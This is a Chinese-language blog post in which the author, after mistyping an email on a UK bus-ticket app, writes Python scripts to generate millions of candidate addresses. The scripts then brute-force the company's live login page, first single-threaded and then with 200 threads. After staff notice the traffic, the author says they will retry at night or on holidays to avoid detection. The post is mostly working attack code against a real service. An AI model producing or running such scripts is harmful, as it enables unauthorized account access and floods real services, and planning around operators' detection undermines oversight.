本文共 2872 字,大约阅读时间需要 9 分钟。
在APP上申请了一个黄巴帐号,由于email输错了,导致买了七天的票不能使用,想找回, 公司却说只能找回密码,不能找回帐号,黄巴的网站也像一坨屎,居然email不经过验证直接可以用,导致你输错了都不知道,于是不甘心白白亏掉自己的12镑于是决定,暴力破解之。
先用Python生成帐号字典:
import osfrom string import ascii_lowercasepds=[]rg=ascii_lowercasefor first in rg: for second in rg: for third in rg: for fourth in rg: for fifth in rg: num= "tjiang@b%s%s%s%s%smouth.ac.uk"%(first,second,third,fourth,fifth) pds.append(num)file_object = open('user.txt', 'w')file_object.writelines(['%s%s' % (x,'\n') for x in pds])#file_object.writelines(['%s%s' % (x,os.linesep) for x in pds])file_object.close( )然后呢, 用firefox中的httpfox来查看下它的登录封包
然后构造程序模拟登录,暴力破解之
import requestsdef Login(user): r = requests.post('https://www.bybus.co.uk/my/login', data={'field[email]': user, 'field[password]':'********', 'register':'Login Now'}) if 'Invalid' in r.text: isFind = False else: isFind = True return isFindfpath=r'C:\Users\RaiderJ\Desktop\crack\user.txt'pfile=open(fpath,'r')correct_set = set()for oneUser in pfile.readlines(): if Login(oneUser): print 'success-' + oneUser correct_set.add(oneUser) else: print 'failed-' + oneUserthefile = open('correct.txt', 'w')for item in correct_set: thefile.write("%s\n" % item)thefile.close()
好了, 开始遍历了。 不过貌似单线程速度很慢,后面让我们开始多线程,并行破解吧
多线程程序
import threadingimport Queueimport requestsmutex = threading.Lock()#Number of threadsn_thread = 200#Create queuequeue = Queue.Queue()def Login(user): r = requests.post('https://www.bybus.co.uk/my/login', data={'field[email]': user, 'field[password]':'*******', 'register':'Login Now'}) if 'Invalid' in r.text: isFind = False else: isFind = True return isFinddef WriteOut(user): with open(r"C:\Users\seamanj\Desktop\crack\correct.txt", "a") as myfile: myfile.write(user) myfile.close() class ThreadClass(threading.Thread): def __init__(self, queue): threading.Thread.__init__(self) #Assign thread working with queue self.queue = queue def run(self): while True: #Get from queue job oneUser = self.queue.get() print self.getName() + ':get' + str(queue.qsize()) + '\n' if Login(oneUser): print 'success-' + oneUser + '\n' if mutex.acquire(): WriteOut(oneUser) mutex.release() else: print 'failed-' + oneUser + '\n' self.queue.task_done()#Create number processfor i in range(n_thread): t = ThreadClass(queue) t.setDaemon(True) #Start thread t.start()#Read file line by linehostfile = open("user.txt","r")for line in hostfile: #Put line to queue queue.put(line) print 'put' + str(queue.qsize()) + '\n'#wait on the queue until everything has been processed queue.join()
不过好像连接太频繁了, 被工作人员发现了
还是等到夜里, 或者过节的时候再crack吧